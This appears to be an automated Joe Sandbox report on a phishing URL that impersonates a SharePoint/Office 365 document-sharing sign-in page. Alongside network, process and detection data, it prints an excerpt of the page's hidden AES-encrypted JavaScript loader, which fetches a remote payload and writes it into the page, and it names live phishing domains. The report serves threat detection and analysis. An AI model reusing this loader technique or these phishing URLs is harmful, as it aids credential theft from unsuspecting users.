Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://magical-variation-300980.framer.app/

Overview

General Information

Sample URL:https://magical-variation-300980.framer.app/
Analysis ID:1522629
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish70
AI detected landing page (webpage, office document or email)
Phishing site or detected (based on various text indicators)
HTML page contains hidden javascript code
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1948,i,12815218099105573422,12125566759229986179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 3048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://magical-variation-300980.framer.app/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_113JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Yara detected HtmlPhish70
    Source: Yara matchFile source: dropped/chromecache_113, type: DROPPED
    Phishing site or detected (based on various text indicators)
    Source: Chrome DOM: 0.2OCR Text: SharePoint YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW All documents are available in pdf online format Reference SCN-39405-PDF-00356120 Size 12.3 MB. B ExpiryllO/07/2024 O Sign in Office 365 to review Encrypted Document Shared with you Preview Documents Made in Framer
    Source: Chrome DOM: 0.1OCR Text: SharePoint YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW All documents are available in pdf online format Reference SCN-39405-PDF-00356120 Size 12.3 MB. B ExpiryllO/07/2024 O Sign in Office 365 to review Encrypted Document Shared with you Preview Documents
    Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.htmlHTTP Parser: Base64 decoded: {"a":"Apa4puLKc3ZAfSWknRgnR+5I6LZTBnpJE\/netMjqdXU=","c":"2c2ec4bc20de31a964a09e47b15aa78f","b":"b23ef74939f8ff59e9dcbd0a56efced622a6c08359f644833ee18df95ce2a39650ab057b9c448b0e642ca82078f0dff4128509ecc914d28b2361aadd96cb881ef184c169ebf7b86290dd1c8b61390d...
    Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.htmlHTTP Parser: async function babushka(oafishness) { <!-- life is a journey; cars are our faithful companions. --> var {a,b,c,d} = json.parse(oafishness); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function zinc() {tacit.hidden = 0;gaiter.hidden = 1; document.write(await babushka(await (await fetch(await babushka(atob(`eyjhijoiqxbhnhb1tetjm1pbzlnxa25sz25skzvjnkxavejucepfxc9uzxrnanfkwfu9iiwiyyi6ijjjmmvjngjjmjbkztmxytk2ngewowu0n2ixnwfhnzhmiiwiyii6imiym2vmnzq5mzlmogzmntllowrjymqwytu2zwzjzwq2mjjhnmmwodm1owy2ndq4mznlzte4zgy5nwnlmmezoty1mgfimdu3yjljndq4yjblnjqyy2e4mja3ogywzgzmndeyoduwowvjyzkxngqyogiymzyxywfkzdk2y2i4odflzje4ngmxnjllymy3yjg2mjkwzgqxyzhinjezotbknjc5njiznjg5oddjnjnkzwy3ywqwyzllmje1mdi5oteznthim2qxmzflzwrmnwy2odriyta3mtc3ytczodmwyzbkyjrlogvmnjeyyjljymywnjcxngnjy2zizjy4otbkmtnkmmq2ognmog...
    Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.htmlHTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49757 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49760 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49763 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.17:49767 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49769 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.17:49772 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.169:443 -> 192.168.2.17:49781 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: global trafficDNS traffic detected: DNS query: magical-variation-300980.framer.app
    Source: global trafficDNS traffic detected: DNS query: framerusercontent.com
    Source: global trafficDNS traffic detected: DNS query: events.framer.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: pyrofel.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: tekmom.exnet.su
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49757 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49760 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49763 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.17:49767 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49769 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.17:49772 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.169:443 -> 192.168.2.17:49781 version: TLS 1.2
    Source: classification engineClassification label: mal56.phis.win@20/28@40/202
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1948,i,12815218099105573422,12125566759229986179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://magical-variation-300980.framer.app/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1948,i,12815218099105573422,12125566759229986179,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Persistence and Installation Behavior

    barindex
    AI detected landing page (webpage, office document or email)
    Source: https://magical-variation-300980.framer.app/LLM: Page contains button: 'Preview Documents' Source: '0.0.pages.csv'
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting    		Valid AccountsWindows Management Instrumentation1
    Browser Extensions    		1
    Process Injection    		1
    Masquerading    		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting    		1
    Registry Run Keys / Startup Folder    		1
    Process Injection    		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    Registry Run Keys / Startup Folder    		Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    https://magical-variation-300980.framer.app/0%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    framerusercontent.com1%VirustotalBrowse
    events.framer.com0%VirustotalBrowse
    pyrofel.com1%VirustotalBrowse
    challenges.cloudflare.com0%VirustotalBrowse
    cdnjs.cloudflare.com0%VirustotalBrowse
    www.google.com0%VirustotalBrowse
    tekmom.exnet.su1%VirustotalBrowse
    code.jquery.com1%VirustotalBrowse

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    framerusercontent.com
    		108.138.7.13
    		truefalseunknown
    events.framer.com
    		3.160.150.29
    		truefalseunknown
    code.jquery.com
    		151.101.194.137
    		truefalseunknown
    cdnjs.cloudflare.com
    		104.17.24.14
    		truefalseunknown
    pyrofel.com
    		185.12.116.220
    		truefalseunknown
    challenges.cloudflare.com
    		104.18.94.41
    		truefalseunknown
    www.google.com
    		142.250.74.196
    		truefalseunknown
    tekmom.exnet.su
    		188.114.97.3
    		truefalseunknown
    magical-variation-300980.framer.app
    		35.71.142.77
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.htmlfalse
        		unknown
        https://magical-variation-300980.framer.app/true
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          108.138.7.13
          		framerusercontent.comUnited States
          		16509AMAZON-02USfalse
          104.17.24.14
          		cdnjs.cloudflare.comUnited States
          		13335CLOUDFLARENETUSfalse
          18.239.69.73
          		unknownUnited States
          		16509AMAZON-02USfalse
          3.160.150.112
          		unknownUnited States
          		16509AMAZON-02USfalse
          142.250.186.163
          		unknownUnited States
          		15169GOOGLEUSfalse
          172.217.18.14
          		unknownUnited States
          		15169GOOGLEUSfalse
          104.18.94.41
          		challenges.cloudflare.comUnited States
          		13335CLOUDFLARENETUSfalse
          35.71.142.77
          		magical-variation-300980.framer.appUnited States
          		237MERIT-AS-14USfalse
          104.18.95.41
          		unknownUnited States
          		13335CLOUDFLARENETUSfalse
          142.251.173.84
          		unknownUnited States
          		15169GOOGLEUSfalse
          3.160.150.33
          		unknownUnited States
          		16509AMAZON-02USfalse
          151.101.2.137
          		unknownUnited States
          		54113FASTLYUSfalse
          239.255.255.250
          		unknownReserved
          		unknownunknownfalse
          142.250.185.174
          		unknownUnited States
          		15169GOOGLEUSfalse
          188.114.97.3
          		tekmom.exnet.suEuropean Union
          		13335CLOUDFLARENETUSfalse
          3.160.150.29
          		events.framer.comUnited States
          		16509AMAZON-02USfalse
          185.12.116.220
          		pyrofel.comPortugal
          		33876FLESK-ASPTfalse
          151.101.194.137
          		code.jquery.comUnited States
          		54113FASTLYUSfalse
          142.250.74.196
          		www.google.comUnited States
          		15169GOOGLEUSfalse

          Private

          IP
          192.168.2.17
          192.168.2.16

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1522629
          Start date and time:2024-09-30 13:53:08 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsinteractivecookbook.jbs
          Sample URL:https://magical-variation-300980.framer.app/
